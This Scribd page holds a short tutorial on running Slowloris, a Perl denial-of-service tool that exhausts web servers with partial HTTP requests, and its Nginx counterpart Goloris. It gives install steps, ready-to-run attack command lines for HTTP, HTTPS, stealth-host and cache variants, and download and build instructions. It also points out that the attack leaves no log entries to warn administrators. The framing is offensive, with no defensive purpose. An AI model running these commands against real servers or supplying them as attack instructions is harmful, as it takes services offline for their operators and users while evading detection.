Scribd Logo
Upload

Welcome to Scribd!

  • Slowloris - The Low Bandwidth HTTP Client

    Uploaded by

    Tramadol_500mg
    52 views3 pages
    Slowloris is NOT a TCP DoS script. Slowloris is making a full TCP connection and is making partial HTTP requests. It's the equivalent of a SYN flood but over HTTP. The ideal situation for many denial of service (DoS) attacks is where all other services remain intact but the web server itself is completely inaccessible. Slowloris holds connections open by sending partial HTTP requests. It continues to send subsequent headers at regular intervals to keep the sockets from closing.

    Copyright

    © © All Rights Reserved

    Available Formats

    RTF, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Slowloris is NOT a TCP DoS script. Slowloris is making a full TCP connection and is making partial HTTP requests. It's the equivalent of a SYN flood but over HTTP. The ideal situation for many denial of service (DoS) attacks is where all other services remain intact but the web server itself is completely inaccessible. Slowloris holds connections open by sending partial HTTP requests. It continues to send subsequent headers at regular intervals to keep the sockets from closing.

    Copyright:

    © All Rights Reserved
    Download as RTF, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as rtf, pdf, or txt
    52 views3 pages

    Slowloris - The Low Bandwidth HTTP Client

    Uploaded by

    Tramadol_500mg
    Slowloris is NOT a TCP DoS script. Slowloris is making a full TCP connection and is making partial HTTP requests. It's the equivalent of a SYN flood but over HTTP. The ideal situation for many denial of service (DoS) attacks is where all other services remain intact but the web server itself is completely inaccessible. Slowloris holds connections open by sending partial HTTP requests. It continues to send subsequent headers at regular intervals to keep the sockets from closing.

    Copyright:

    © All Rights Reserved
    Download as RTF, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as rtf, pdf, or txt
    of 3

    Slowloris - The low bandwidth HTTP client

    * This manual is part of the tutorial video on YouTube: Slowloris - The low
    bandwidth HTTP client http://youtu.be/9yyJBaCU-fs

    Slowloris is a Perl script written by Robert 'RSnake' Hansen. Slowloris is NOT a


    TCP DoS script. Slowloris is making a full TCP connection and is making partial
    HTTP requests. It's the equivalent of a SYN flood but over HTTP.
    The ideal situation for many denial of service (DoS) attacks is where all other
    services remain intact but the webserver itself is completely inaccessible.
    Slowloris holds connections open by sending partial HTTP requests. It
    continues to send subsequent headers at regular intervals to keep the
    sockets from closing.
    While the attack is underway, the log file won't be written until the request is
    completed. So you can keep a server down for minutes at a time without a
    single log file entry showing up to warn a administrator who might watching
    in that instant.

    You need to install Perl: http://www.activestate.com/activeperl/downloads


    to run Slowloris. Slowloris requiring the Perl modules:
    IO::Socket::INET
    IO::Socket::SSL
    GetOpt::Long
    Slowloris works MUCH better and faster if you have threading, so install
    threads and threads::shared. You can install modules using CPAN. You need to
    type these commands into a Terminal emulator (Mac OS X, Win32, X
    Windows/Linux): cpan App::cpanminus
    Slowloris runs better on a *NIX operating system (not from within a virtual
    machine) than on Windows. The Slowloris command lines are:

    HTTP DoS Example:


    slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500
    -tcpto 5

    HTTPReady Bypass Example:


    slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500
    -tcpto 5 -httpready

    Stealth Host DoS Example:


    slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500
    -tcpto 1 -shost www.virtualhost.com

    HTTPS DoS Example:


    slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500
    -https

    HTTP Cache Example:


    slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500
    -cache

    In Linux just type perl before the command line: perl slowloris.pl
    -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5

    Download Slowloris here: http://ha.ckers.org/slowloris/slowloris.pl

    Goloris
    Goloris is Slowloris for a Nginx server DoS. The usage of Goloris is in the files
    on Github:

    go get -u -a github.com/valyala/goloris
    go build github.com/valyala/goloris
    ./goloris -help

    Download Goloris here: https://github.com/valyala/goloris

    You might also like